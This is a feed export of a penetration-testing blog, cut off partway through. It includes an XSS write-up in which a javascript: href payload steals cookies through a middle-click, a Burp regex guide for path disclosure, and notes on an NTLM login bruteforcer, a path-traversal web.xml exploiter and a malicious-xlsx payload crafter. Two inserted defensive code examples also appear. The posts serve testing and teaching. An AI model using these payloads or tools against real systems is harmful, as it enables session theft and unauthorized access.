tag:blogger.com,1999:blog-21859860605838728312024-03-13T21:30:16.683-07:00DcLabs - Security TeamUnknownnoreply@blogger.comBlogger32125tag:blogger.com,1999:blog-2185986060583872831.post-89520479050895344882021-05-12T02:45:00.006-07:002021-05-12T03:00:10.198-07:00 The curious case of XSS and the mouse middle button.<p>Hi guys! Today I will share my experience of how I exploited an XSS in a pretty particular scenario. </p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">During analysis, there was a feature on the application that allows the customer to add external reference links for specific options.</p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">So, there were input filters not allowing double quotes, <, >, and other characters.
The injection would happen only in the href parameter.</span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><br /></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">Basically: </span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><b><i><a href="<xss_here>" target="_blank">ClickMe</a></i></b></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><br /></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" 
style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">At this point, I thought, piece of cake, I will inject a standard payload like<b><i> javascript:alert(1)</i></b>, and that's it, exploited! <br /><br /></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><b><i><a href="javascript:alert(1)" target="_blank">ClickMe</a></i></b> Right?</span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"> </span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: 
initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">WRONG! </span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><br /></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">As you know, the "target" parameter controls the window link behavior. </span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">In this case, it forces the link to open in a new tab due to the _blank value. 
When you left-click on the link (the usual behavior), even with the <b><i>javascript:alert(1)</i></b> payload, the browsers handle it differently:</span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><br /></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><strong style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">Firefox:</strong><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"> Opens a new blank tab with the payload in the URL address bar.<br /><br /></span></p><div class="separator" style="clear: both; text-align: center;"><a href="https://lh3.googleusercontent.com/-80nwqGFP-kA/YJuSFKH1GNI/AAAAAAAACiA/ZJrFHxvtN3UlnQ0QNmuwhNZZ5JGv8m7xQCLcBGAsYHQ/image.png" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="292" data-original-width="591" height="198" src="https://lh3.googleusercontent.com/-80nwqGFP-kA/YJuSFKH1GNI/AAAAAAAACiA/ZJrFHxvtN3UlnQ0QNmuwhNZZ5JGv8m7xQCLcBGAsYHQ/w400-h198/image.png" width="400" /></a></div><br /> <br /><div style="text-align: left;"><strong style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat:
initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">Chrome and Edge:</strong><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"> Open a new blank tab with about:blank#blocked on the URL address bar. <br /></span><br /><br /></div><div style="text-align: left;"><br /></div><div style="text-align: center;"><a href="https://lh3.googleusercontent.com/-fZ9eXwdg3GI/YJuSfzILwTI/AAAAAAAACiM/wNobdUcxN94TcLP3ueC5UE8qJMbFemt8ACLcBGAsYHQ/image.png" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="226" data-original-width="571" height="159" src="https://lh3.googleusercontent.com/-fZ9eXwdg3GI/YJuSfzILwTI/AAAAAAAACiM/wNobdUcxN94TcLP3ueC5UE8qJMbFemt8ACLcBGAsYHQ/w400-h159/image.png" width="400" /></a><br /><br /></div><span style="color: black;"><div class="separator" style="clear: both; text-align: center;"><a href="https://lh3.googleusercontent.com/-fZ9eXwdg3GI/YJuSfzILwTI/AAAAAAAACiM/wNobdUcxN94TcLP3ueC5UE8qJMbFemt8ACLcBGAsYHQ/image.png" style="margin-left: 1em; margin-right: 1em;"></a><div class="separator" style="clear: both; text-align: center;"><a href="https://lh3.googleusercontent.com/-fZ9eXwdg3GI/YJuSfzILwTI/AAAAAAAACiM/wNobdUcxN94TcLP3ueC5UE8qJMbFemt8ACLcBGAsYHQ/image.png" style="margin-left: 1em; margin-right: 1em;"></a><a href="https://lh3.googleusercontent.com/-l7sbdNWCr5c/YJuSWR0zZbI/AAAAAAAACiI/3n_J9EASokUP3iF5279bpPravaoU2GobQCLcBGAsYHQ/image.png" style="margin-left: 1em; margin-right: 1em; text-align: center;"><img alt="" data-original-height="198" data-original-width="568" height="140" src="https://lh3.googleusercontent.com/-l7sbdNWCr5c/YJuSWR0zZbI/AAAAAAAACiI/3n_J9EASokUP3iF5279bpPravaoU2GobQCLcBGAsYHQ/w400-h140/image.png" width="400" /></a></div><div 
style="text-align: left;"></div></div></span><p></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><br />So, based on this behavior, it's clear it cannot be exploited just by left-clicking on the link.</span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><br /></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">I tried to change the target parameter value using javascript, but the instruction to open a new tab executes first, so there is no way to rewrite the value on the fly. 
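An added example of the server-side fix for the href injection described above; this is my code, not the post's or the application's. The filter rejected characters such as double quotes and angle brackets, but the javascript:alert(1) payload needs none of them, so the check below parses each submitted reference link with the URL constructor and accepts only http: and https:. The base origin https://app.example/ and the function names are assumptions.

```javascript
// Added example, not code from the original post or from the application it
// describes. The application's filter rejected characters such as double
// quotes and angle brackets, but "javascript:alert(1)" contains none of them,
// so a character denylist cannot stop a scheme injection into href. The check
// below parses the submitted value as a URL and allows only http(s) schemes.

const ALLOWED_PROTOCOLS = new Set(["http:", "https:"]);

// Base origin used to resolve relative links; an assumption for this example.
const BASE_ORIGIN = "https://app.example/";

// Returns true when `value` may be placed in <a href="...">.
// The WHATWG URL parser lowercases the scheme and strips leading and
// trailing whitespace, so the protocol check covers those variants without
// any string matching on the raw input.
function isSafeHref(value) {
  if (typeof value !== "string" || value.trim() === "") return false;
  let url;
  try {
    url = new URL(value, BASE_ORIGIN);
  } catch (e) {
    return false; // unparsable input is rejected rather than "cleaned"
  }
  return ALLOWED_PROTOCOLS.has(url.protocol);
}

// Minimal HTML attribute/text escaping for the rendered anchor.
function escapeHtml(s) {
  return s.replace(/[&<>"']/g, (c) => (
    { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" }[c]
  ));
}

// Renders the reference link the way the post's markup does, replacing a
// rejected href with a harmless "#". rel="noopener noreferrer" is an extra
// hardening for target="_blank" links, not something the post discusses.
function renderReferenceLink(href, label) {
  const safeHref = isSafeHref(href) ? href : "#";
  return `<a href="${escapeHtml(safeHref)}" target="_blank" rel="noopener noreferrer">${escapeHtml(label)}</a>`;
}

// Constructed inputs, including the payload from the post.
const samples = [
  "https://example.com/reference",
  "/docs/reference",
  "javascript:alert(1)",
  "JavaScript:alert(document.cookie)",
  "data:text/html,hello",
];
for (const s of samples) {
  console.log(JSON.stringify(s), "->", isSafeHref(s));
}
```

One design consequence to know about: a protocol-relative value such as //other.example/x resolves to the base scheme and passes the protocol check, so if external reference links must stay within a set of approved hosts, compare url.origin against an allowlist as well.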
</span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><br /></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">After some research, I found these links https://bugzilla.mozilla.org/show_bug.cgi?id=55696 and https://support.mozilla.org/en-US/questions/1289787 related to new tab/window and javascript execution. Then the idea to use the mouse middle button popped up, and BANG! </span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><br /></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">By default, the browsers (Firefox, Chrome, and Edge) have the middle button configured to force links to open in a new tab.
So, by using this button, the browsers executed the Javascript! Also, this time, the behavior was slightly different, and it can interfere during the exploitation. To test these conditions, I changed the payload to <b><i>javascript:alert(document.cookie) </i></b></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><br /></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><strong style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">Firefox:</strong><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"> The browser executed the javascript in a new blank tab. 
However, the javascript could not read the cookie, as expected, because it ran in a blank tab outside the application context.</span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><br /></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><br /></p><div class="separator" style="clear: both; text-align: center;"><a href="https://lh3.googleusercontent.com/-ryR23bQSudU/YJugCRMuleI/AAAAAAAACiY/59V1hfTwsIg99UV43lbLmY_qO1W8mLJnQCLcBGAsYHQ/image.png" style="margin-left: 1em; margin-right: 1em;"><span style="color: black;"><img alt="" data-original-height="504" data-original-width="753" height="268" src="https://lh3.googleusercontent.com/-ryR23bQSudU/YJugCRMuleI/AAAAAAAACiY/59V1hfTwsIg99UV43lbLmY_qO1W8mLJnQCLcBGAsYHQ/w400-h268/image.png" width="400" /></span></a></div><br /><br /><br /><p></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><strong style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">Chrome and Edge:</strong><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"> The browsers weirdly did not open a new tab, even when forced by the middle button. So the javascript is executed in the application context; that is, it can read the application cookies.</span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><br /></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"></span></p><div class="separator" style="clear: both; text-align: center;"><a href="https://lh3.googleusercontent.com/-4O1KDLWDejM/YJugaXPdd3I/AAAAAAAACig/uA4ge-DgFbEkVoj3cLfyac5KA05FWXJnwCLcBGAsYHQ/image.png" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="236" data-original-width="709" height="134" src="https://lh3.googleusercontent.com/-4O1KDLWDejM/YJugaXPdd3I/AAAAAAAACig/uA4ge-DgFbEkVoj3cLfyac5KA05FWXJnwCLcBGAsYHQ/w400-h134/image.png" width="400" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: center;"><div class="separator" style="clear: both; text-align: center;"><a
href="https://lh3.googleusercontent.com/-xN8a1dCUOTU/YJugmXuZ2RI/AAAAAAAACik/Ys7ACy-5KeME9aRCcnFblklbCxnRcaZXgCLcBGAsYHQ/image.png" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="247" data-original-width="872" height="114" src="https://lh3.googleusercontent.com/-xN8a1dCUOTU/YJugmXuZ2RI/AAAAAAAACik/Ys7ACy-5KeME9aRCcnFblklbCxnRcaZXgCLcBGAsYHQ/w400-h114/image.png" width="400" /></a></div><br /><br /></div><br /><br /><p></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">That's all, folks! Cya!</p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; color: #0e101a; margin-bottom: 0pt; margin-top: 0pt;"></p>Unknownnoreply@blogger.com1tag:blogger.com,1999:blog-2185986060583872831.post-71933267362947023872021-03-23T04:07:00.001-07:002021-03-23T04:12:57.121-07:00Burp Suite - Adding Internal Path Disclosure Capabilities Hi guys, I hope everyone is healthy. <br /><br />If you work with Burp suite, maybe you noticed Burp cannot identify Internal PATH Disclosure vulnerabilities by default.<br /><br />I know most of the time, this vulnerability is ranked as Informational or Low. But I decided to write this after using the information acquired due to the internal path leakage to perform a more complex chain attack. <br /><br />For this reason, the vulnerability was ranked as high due to the overall impact. 
In other words, I would not be able to create an effective attack chain without this leaked path.<br /><br />The implementation is quite simple: <br /><br />Install the extension Burp Bounty (unfortunately, it is available for Burp Pro only).<br />On the tab Profiles -> Passive Response Profiles -> Add<br />Fill in the fields (Response) and click on Add<br />Here you add the regex you are looking for. It's possible to add more than one regex. In my case, I created two different profiles, one for Windows issues and another one for Linux. <br /><br />The regex for each case: <br /><br />Linux: (?<!\S)(?:/[^/\s>]+)+<br />Thanks to codeworm for the help with the Linux regex.<br /><br />Windows: ([a-zA-Z]):\\?(\\[a-zA-Z0-9._-].*\s.*+)+\\<br />For Windows, the regex still needs some enhancements. <br /><br />The new issues:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://lh3.googleusercontent.com/-x22uvG1Injw/YFnEaeWniXI/AAAAAAAACgA/kOwqWz-gWuI22NEa-kYKSrcoj9g0dHReQCLcBGAsYHQ/image.png" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="751" data-original-width="890" src="https://lh3.googleusercontent.com/-x22uvG1Injw/YFnEaeWniXI/AAAAAAAACgA/kOwqWz-gWuI22NEa-kYKSrcoj9g0dHReQCLcBGAsYHQ/s16000/image.png" /></a></div><br /><br /><br />Now, some extra configuration is required for Burp to show it properly on the Target tab.<br />Click on the Issue tab and fill in the fields. Severity and Confidence must be selected; you are free to select the rating you want.
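The Linux regex above, applied in JavaScript to constructed response bodies the way the passive profile applies it. This is an added example, not code from the post or from Burp Bounty; the issue name, severity and confidence are assumed values. The Windows regex is not exercised here because its possessive quantifier (.*+) is not accepted by JavaScript's regex engine.

```javascript
// Added example, not code from the original post or from Burp Bounty. It runs
// the post's Linux path regex over constructed response bodies the way the
// passive profile would, and reports one record per match. The issue name,
// severity and confidence values are assumptions for this example.

// Regex exactly as given in the post. The lookbehind (?<!\S) requires the
// first "/" to be at the start of the text or preceded by whitespace, so
// "href=/static/app.js" and "http://host/x" are not reported.
const LINUX_PATH_RE = /(?<!\S)(?:\/[^\/\s>]+)+/g;

// Scans one response body and returns Burp-style issue records.
function findLinuxPaths(body, severity = "Low", confidence = "Tentative") {
  const issues = [];
  for (const m of body.matchAll(LINUX_PATH_RE)) {
    issues.push({
      name: "Internal Path Disclosure (Linux)",
      severity,
      confidence,
      match: m[0],
      offset: m.index,
    });
  }
  return issues;
}

// Constructed response bodies; not captured from any real system.
const SAMPLE_BODIES = [
  // PHP-style warning leaking the document root.
  "<b>Warning</b>: include(config.php): failed to open stream in /var/www/html/index.php on line 12",
  // URL paths and absolute URLs must not match.
  '<a href=/static/app.js>app</a> see http://cdn.example/lib.js',
  // The class [^/\s>] does not stop at punctuation, so the trailing comma
  // is part of the match; a stricter profile would trim it.
  "Traceback (most recent call last):\n  File /opt/app/handlers/upload.py, line 88",
  "Everything is fine.",
];

// Returns the issue records per sample body, in order.
function scanAll(bodies = SAMPLE_BODIES) {
  return bodies.map((b) => findLinuxPaths(b));
}

scanAll().forEach((issues, i) => {
  console.log(`body ${i}:`, issues.map((x) => `${x.match} (${x.severity}/${x.confidence})`));
});
```

Two behaviours worth knowing when tuning the profile: the lookbehind is what keeps URL paths such as href=/static/app.js out of the results, and the class [^/\s>] does not exclude punctuation, so a path followed by a comma is reported with the comma attached.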
The issue detail is the information that will be displayed on the Target tab.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://lh3.googleusercontent.com/-EYa6IA4Ea6s/YFnGA7pNooI/AAAAAAAACgI/zicjv_p_QngOeOJ2yaX_Uu9Nkiydc_N3QCLcBGAsYHQ/image.png" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="666" data-original-width="798" src="https://lh3.googleusercontent.com/-EYa6IA4Ea6s/YFnGA7pNooI/AAAAAAAACgI/zicjv_p_QngOeOJ2yaX_Uu9Nkiydc_N3QCLcBGAsYHQ/s16000/image.png" /></a></div><br />After you have added all the information, click OK and double-check that everything was saved. Sometimes the extension does not save the regex, in which case you must add it again.<br /><br />Testing your new issues:<br /><br />Navigate to https://owasp.org/www-community/attacks/Full_Path_Disclosure and run a passive scan on this page.<br /><br />Your Burp should show something like this:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://lh3.googleusercontent.com/-mXJDEph_JTg/YFnJPx2WQxI/AAAAAAAACgQ/s-_dWXWzrHMMblb4-XeBQ63h1x831o0wACLcBGAsYHQ/image.png" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="344" data-original-width="1202" src="https://lh3.googleusercontent.com/-mXJDEph_JTg/YFnJPx2WQxI/AAAAAAAACgQ/s-_dWXWzrHMMblb4-XeBQ63h1x831o0wACLcBGAsYHQ/s16000/image.png" /></a></div><br /><br />Note: The Severity and Confidence are different on purpose, just to show that the two issues can be rated differently.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://lh3.googleusercontent.com/-05s0S2Z1dGQ/YFnJ5LpIfzI/AAAAAAAACgY/d8KSGIn_ZicPpNYkXSBWYRr2ZKkKXygcACLcBGAsYHQ/image.png" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="728" data-original-width="567" src="https://lh3.googleusercontent.com/-05s0S2Z1dGQ/YFnJ5LpIfzI/AAAAAAAACgY/d8KSGIn_ZicPpNYkXSBWYRr2ZKkKXygcACLcBGAsYHQ/s16000/image.png"
/></a></div><br /><br /><p>Checking the match in the source code:<br /><br />Linux: <br /><br /></p><div class="separator" style="clear: both; text-align: center;"><a href="https://lh3.googleusercontent.com/-lceWdlna6Y0/YFnLFqo9ShI/AAAAAAAACgg/VrU4uQRGV0gnldwWb_Duq69LY2CWk8sSQCLcBGAsYHQ/image.png" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="707" data-original-width="1123" src="https://lh3.googleusercontent.com/-lceWdlna6Y0/YFnLFqo9ShI/AAAAAAAACgg/VrU4uQRGV0gnldwWb_Duq69LY2CWk8sSQCLcBGAsYHQ/s16000/image.png" /></a></div><br /><br />Windows:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://lh3.googleusercontent.com/-w6LgVtlSsY4/YFnLVz8GLOI/AAAAAAAACgo/pCpeG7aEbZUz_dHccWrYsTZe3IaTrxglwCLcBGAsYHQ/image.png" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="499" data-original-width="1075" src="https://lh3.googleusercontent.com/-w6LgVtlSsY4/YFnLVz8GLOI/AAAAAAAACgo/pCpeG7aEbZUz_dHccWrYsTZe3IaTrxglwCLcBGAsYHQ/s16000/image.png" /></a></div><br /><br /> <br />That's it, guys! <br />Once I update the Windows regex, I will update the post.<p></p>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2185986060583872831.post-3434955023384004382021-03-23T03:17:00.002-07:002021-03-23T03:17:25.288-07:00WebNBFWebNBF<br />https://github.com/crashbrz/WebNBF<br /><br />Simple Bash "Multitask" Web NTLM Authentication Bruteforcer.<br /><a href="https://github.com/crashbrz/WebNBF#usagehelp"></a>Usage/Help<br />./webnbf.sh <userlist> <passwordlist> https://target
<br /><br /><a href="https://github.com/crashbrz/WebNBF#proxy"></a>Proxy<br /><br />Add or remove the curl proxy parameters according to your environment.Unknownnoreply@blogger.com1tag:blogger.com,1999:blog-2185986060583872831.post-28165754171094591592021-03-23T03:16:00.000-07:002021-03-23T03:16:05.955-07:00WebXmlExploiter<br />WebXmlExploiter<br />https://github.com/crashbrz/WebXmlExploiter<br /><br />WebXmlExploiter is a tool to exploit web.xml files exposed by misconfiguration or path traversal.<br />It will try to download all .class and XML files based on the information extracted from the web.xml file.<br /><a href="https://github.com/crashbrz/WebXmlExploiter#notes"></a><br />Notes<br />WebXmlExploiter is an exploitation tool only, not a vulnerability scanner.<br />I will not add a brute-forcing feature since tools like wfuzz, ffuzz, and Burp Suite can do it better.<br />I recommend running jadx to decompile the .class files.<br /><a href="https://github.com/crashbrz/WebXmlExploiter#installation"></a><br />Installation<br />Download the latest release and unpack it in the desired location.<br />Remember to install GoLang in case you want to run from the source.<br />WebXmlExploiter uses the github.com/antchfx/xmlquery library.<br /><br />Check the following link for more information: <a href="https://github.com/antchfx/xmlquery/">https://github.com/antchfx/xmlquery/</a><br /><br />Run go get github.com/antchfx/xmlquery before running WebXmlExploiter.<br /><a href="https://github.com/crashbrz/WebXmlExploiter#license"></a><br />License<br />WebXmlExploiter is licensed under the SushiWare license. Check <a href="https://github.com/crashbrz/WebXmlExploiter/blob/main/docs/license.txt">docs/license.txt</a> for more information.<br /><a href="https://github.com/crashbrz/WebXmlExploiter#usagehelp"></a>Usage/Help<br /><br />Please refer to the output of -h for usage information and general help.
Also, you can contact me on ##spoonfed@freenode.org (two #)<br /><br /><br />Example: go run webxmlexploiter.go -u <a href="https://vulnapp/WEB-INF/">https://vulnapp/somedir/anotherdir/../../../WEB-INF/</a><br /><br />Go Version<br /><br />Tested on:<br />go version go1.14.4 windows/amd64<br />go version go1.15.2 linux/amd64<br /><a href="https://github.com/crashbrz/WebXmlExploiter#to-do"></a><br />To Do<br />Parsing enhancements<br />Add cookie support.Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2185986060583872831.post-1824944119537106592020-07-01T06:29:00.000-07:002020-07-01T06:29:14.320-07:00Xcrafter - Portable Excel Open XML format command line file crafter<h1 style="border-bottom: 1px solid rgb(234, 236, 239); box-sizing: border-box; line-height: 1.25; margin: 24px 0px 16px; padding-bottom: 0.3em;">
<span style="background-color: black; color: white;">
Xcrafter</span></h1>
<div style="box-sizing: border-box; font-size: 16px; margin-bottom: 16px;">
<span style="background-color: black; color: white;">Xcrafter is a portable Excel Open XML format command line file crafter. Xcrafter allows you to create xlsx files and embed payloads, like XSS, XXE, SQLi, SSRF, and others, in an easy and fast way, even without Excel or Calc installed.</span></div>
<div style="box-sizing: border-box; font-size: 16px; margin-bottom: 16px;">
<span style="background-color: black; color: white;">Also, Xcrafter can create regular Excel files if you are not looking for a security tool.</span></div>
<h3 style="box-sizing: border-box; font-size: 1.25em; line-height: 1.25; margin-bottom: 16px; margin-top: 24px;">
<a aria-hidden="true" class="anchor" href="https://github.com/crashbrz/Xcrafter#installation" id="user-content-installation" style="box-sizing: border-box; float: left; line-height: 1; margin-left: -20px; padding-right: 4px;"><svg aria-hidden="true" class="octicon octicon-link" height="16" version="1.1" viewbox="0 0 16 16" width="16"><span style="background-color: black; color: white;"><path d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z" fill-rule="evenodd"></path></span></svg></a><span style="background-color: black; color: white;">Installation</span></h3>
<div style="box-sizing: border-box; font-size: 16px; margin-bottom: 16px;">
